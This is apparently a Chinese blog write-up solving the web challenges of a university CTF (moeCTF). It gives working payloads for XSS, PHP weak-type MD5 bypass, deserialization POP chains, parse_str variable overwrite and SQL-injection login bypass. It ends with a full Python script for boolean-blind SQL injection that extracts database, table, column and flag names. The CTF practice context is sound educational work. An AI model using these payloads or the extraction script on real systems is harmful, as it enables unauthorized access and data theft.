西北大学moeCTF-Web

前言

好久之前找到的一个CTF平台,今天偶然翻了出来,web部分还剩几道题,顺便刷掉吧……

机器人

很明显是robots协议

http://47.93.187.174/nwuctf/robots.txt

直接访问此文件得到flag

nwuctf{robots_is_NOT_RobotQAQ}

让我们来弹一个flag

根据题目意思,那就弹一个flag,在输入框输入<script>alert('flag')</script>得到flag

php弱类型

查看源代码

1
2
3
4
5
6
7
8
9
10
</?php
$s = $_GET['s'];
$a = 'QNKCDZO';
$md5a = md5($a);
$md5s = md5($s);
if($s != $a && $md5a == $md5s){
echo $flag;
}else{
echo 'try again';
}

GET方式给s赋一个值,使s不等于a且s的md5值等于a的md5值,这里的==弱类型比较只会比较变量的内容并不会比较变量类型。题中所给的$a的MD5值是0e开头的,这就导致php将它解析为科学计数法,所以我们只需再找一个MD5加密以0e开头的字符串即可
payload:

?s=s878926199a

An easy SQLi 2

万能密码username:'or 1=1,密码随便输,出flag

头啊头哇

首先赋值get=flag,然后会提示“必须使用IceRabbit浏览器”,改代理为IceRabbit Browser,接着会提示“你从google来吗?”,改Referer为www.google.comgetflag

唯快不破?

打开链接可以看到网页进行了多次跳转,利用python抓取页面就行了,将三个页面信息拼接得到flag

php反序列化

主页给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
error_reporting(0);
class hack
{
public $mod1;
public function __destruct()
{
$this->mod1 = "concat string".$this->mod1;
}

}
class str
{
public $str1;
public function __toString()
{
$this->str1->flag();
return "1";
}
}
class get_flag
{
public function flag()
{
echo "tql, 缁欏笀鍌呴€抐lag:"."nwuctf{xxxxxxxxxxxxxxx}";
}
}
$a = $_GET['string'];
unserialize($a);
highlight_file(__FILE__);
?>

构造pop链,flag可以通过str类的 __ toString方法输出。该方法会在类被当做字符串的时候自动调用,所以自然而然想到利用hack类中的__destruct

payload代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class hack
{
public $mod1;
public function __construct()
{
$this->mod1 = new str;
}

}
class str
{
public $str1;
public function __construct()
{
$this->str1 = new get_flag;
}
}

class get_flag
{
public function flag()
{
echo "tql, 缁欏笀鍌呴€抐lag:"."nwuctf{xxxxxxxxxxxxxxx}";
}
}

$a = new hack;
$b = serialize($a);
echo $b;
?>

payload:

string=O:4:%22hack%22:1:{s:4:%22mod1%22;O:3:%22str%22:1:{s:4:%22str1%22;O:8:%22get_flag%22:0:{}}}

如果还有如果

题目给了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 <?php

$flag="nwuctf{xxxxxxxxxxxxxxxxxxxx}";
if (!empty($_SERVER['QUERY_STRING'])) {
$query = $_SERVER['QUERY_STRING'];
$res = parse_str($query);
if (!empty($res['action'])){
$action = $res['action'];
}
}
if ($action === 'auth') {
if (!empty($res['user'])) {
$user = $res['user'];
}
if (!empty($res['pass'])) {
$pass = $res['pass'];
}

if (!empty($user) && !empty($pass)) {
$hashed_password = hash('md5', $user.$pass);
}
if (!empty($hashed_password) && $hashed_password === '22180f07c8d8de04667257a18d9a64c6') {
echo $flag;
}
else {
echo 'fail :(';
}
}
else {
highlight_file(__FILE__);
}

利用parse_str函数覆盖变量hashed_password的值

payload:

action=auth&hashed_password=22180f07c8d8de04667257a18d9a64c6

An easy SQLi

挺简单的,直接上sqlmap跑

sql注入漏洞

sqlmap不是万能的╥﹏╥,只能靠自己手动注入了,简单测试了一下拦截了以下关键词order | left | mid | substr | like | = | %23(#)|ascii
那就用right|regexp|--+进行注入吧~
利用BP抓包并爆破?部分,突然发现MySQL不区分大小写???WTF!
一路走来爆到不明大小写的库名、表名、列名、字段,很崩溃!因为过滤掉了asciiord,在网上也没找到什么有用的相关资料,于是直接去找出题人聊了聊。他说这大小写并不是自己想要考察的点,只是无奈之下的一个非预期效果……好吧 Orz。然后他甩给我一个链接。只要加入关键词binary就行了。

  • 爆库

    id=1’ and right(database(),1) regexp binary ‘§?§’ –+

  • 爆表

    id=1’ and right((select group_concat(table_name) from information_schema.tables where table_schema regexp “ctf”),1) regexp binary ‘§?§’ –+

  • 爆列

    id=1’ and right((select group_concat(column_name) from information_schema.columns where table_name regexp “fla49”),1) regexp ‘§?§’ –+

  • 爆段的最后一步

    id=1’ and right((select group_concat(flag) from fla49),29) regexp binary ‘§?§wuctf{Her3_is_SQLi_FlaggQWQ}’ –+

当然也可以用脚本跑
下面附上我写的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import requests as r

dic = '_{}-+abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

def Database():
global db_name
db_name = ''
flag1 = 0
for i in range(1,50):
for j in dic:
url1 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right(database(),'+str(i)+') regexp binary \''+j+db_name+'\' --+'
#print(url1)
res1 = r.get(url1)
if 'hello' in res1.text:
db_name = j+db_name
print(db_name)
break
if j == '9':
flag1 = 1
if flag1 == 1:
print('Database --> '+db_name)
break

def Table():
global ta_name
ta_name = ''
flag2 = 0
for i in range(1,50):
for j in dic:
url2 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat(table_name) from information_schema.tables where table_schema regexp "'+db_name+'"),'+str(i)+') regexp binary \''+j+ta_name+'\' --+'
#print(url2)
res2 = r.get(url2)
if 'hello' in res2.text:
ta_name = j+ta_name
print(ta_name)
break
if j == '9':
flag2 = 1
if flag2 == 1:
print('Table_name --> '+ta_name)
break

def Column():
global co_name
co_name = ''
flag3 = 0
for i in range(1,50):
for j in dic:
url3 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat(column_name) from information_schema.columns where table_name regexp "'+ta_name+'"),'+str(i)+') regexp \''+j+co_name+'\' --+'
#print(url3)
res3 = r.get(url3)
if 'hello' in res3.text:
co_name = j+co_name
print(co_name)
break
if j == '9':
flag3 =1
if flag3 == 1:
print('Column_name --> '+co_name)
break

def Flag():
flag = ''
flag4 = 0
for i in range(1,50):
for j in dic:
url4 = 'http://123.207.166.65/nwuctf/zfgbhjyuk.php?id=1\' and right((select group_concat('+co_name+') from '+ta_name+'),'+str(i)+') regexp binary \''+j+flag+'\' --+'
#print(url4)
res4 = r.get(url4)
if 'hello' in res4.text:
flag = j+flag
print(flag)
break
if j == '9':
flag4 = 1
if flag4 == 1:
print('flag --> '+flag)
break

if __name__ == '__main__':
Database()
Table()
Column()
Flag()

被SQL玩的团团转。。。卒

文章作者: Cryscat
文章链接: http://www.cryscat.com/2019/03/10/西北大学moeCTF-Web/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Cryscat's Blog
打赏
  • 微信
  • 支付宝

评论